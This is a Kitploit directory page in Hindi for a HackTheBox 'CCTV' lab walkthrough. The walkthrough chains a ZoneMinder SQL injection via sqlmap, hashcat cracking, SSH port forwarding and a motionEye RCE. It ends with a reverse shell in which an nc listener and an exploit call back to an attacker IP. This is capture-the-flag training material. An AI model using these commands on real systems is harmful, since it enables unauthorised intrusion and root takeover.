Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cctv — HackTheBox CCTV walkthrough जिसमें CVE-2024-51482 ZoneMinder SQL injection, bcrypt hash cracking, और CVE-2025-60787 motionEye RCE को chain करके root प्राप्त किया जाता है। | Kitploit
उपकरण/GitHubGitHub/ledksv/cctv
पासवर्ड क्रैकिंगविशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubledksv/cctv

cctv

HackTheBox CCTV walkthrough जिसमें CVE-2024-51482 ZoneMinder SQL injection, bcrypt hash cracking, और CVE-2025-60787 motionEye RCE को chain करके root प्राप्त किया जाता है।

10घं 51मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

CCTV — HackTheBox वॉकथ्रू

प्लेटफ़ॉर्म: HackTheBox | OS: Linux

अटैक चेन

CVE-2024-51482 के माध्यम से ZoneMinder SQL इंजेक्शन डेटाबेस से एक bcrypt हैश निकालता है। hashcat से इसे क्रैक करने पर SSH एक्सेस मिलता है। पोर्ट फ़ॉरवर्डिंग के ज़रिए एक्सपोज़ किया गया आंतरिक motionEye इंस्टेंस CVE-2025-60787 के प्रति असुरक्षित है — जो रूट शेल देता है।

एन्यूमरेशन

root@kitploit:~
nmap -sV -sC 10.129.53.160 -Pn

22/tcp open  ssh     OpenSSH 9.6p1 (Ubuntu)
80/tcp open  http    Apache 2.4.58 — SecureVision CCTV & Security Solutions

/etc/hosts में cctv.htb जोड़ा गया। पोर्ट 80 पर एक ZoneMinder इंस्टॉलेशन होस्ट था।

CVE-2024-51482 — ZoneMinder SQL इंजेक्शन

CVE-2024-51482, ZoneMinder के लॉगिन एंडपॉइंट में एक SQL इंजेक्शन भेद्यता है। username पैरामीटर सैनिटाइज़ नहीं किया गया है, जिससे डेटाबेस एक्सट्रैक्शन संभव हो जाता है।

root@kitploit:~
sqlmap -u "http://cctv.htb/zm/index.php" \
  --data="username=admin&password=admin&action=login" \
  --dbms=mysql --dump --batch

users टेबल से एक bcrypt पासवर्ड हैश निकाला गया।

हैश क्रैकिंग

root@kitploit:~
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt

पासवर्ड क्रैक हो गया।

SSH फ़ुटहोल्ड

root@kitploit:~
ssh <user>@10.129.53.160

यूज़र फ़्लैग प्राप्त किया गया। आंतरिक सेवाओं की जाँच की गई।

root@kitploit:~
ss -tlnp
# 127.0.0.1:8765 — motionEye CCTV management panel

पोर्ट फ़ॉरवर्ड किया गया।

root@kitploit:~
ssh -L 8765:127.0.0.1:8765 <user>@10.129.53.160

CVE-2025-60787 — motionEye RCE

CVE-2025-60787, motionEye में एक ऑथेंटिकेटेड RCE है। आंतरिक पैनल तक पहुँच के साथ, मनमाने कमांड root के रूप में निष्पादित होते हैं।

root@kitploit:~
nc -lvnp 4444
python3 exploit_CVE-2025-60787.py --url http://127.0.0.1:8765 --lhost <ATTACKER_IP> --lport 4444

रूट शेल प्राप्त किया गया। रूट फ़्लैग /root/root.txt पर है।


केवल शैक्षिक उद्देश्यों के लिए। केवल उन्हीं सिस्टमों का परीक्षण करें जिनके आप मालिक हैं या जिनका परीक्षण करने की आपके पास स्पष्ट अनुमति है।

टूल डाउनलोड करें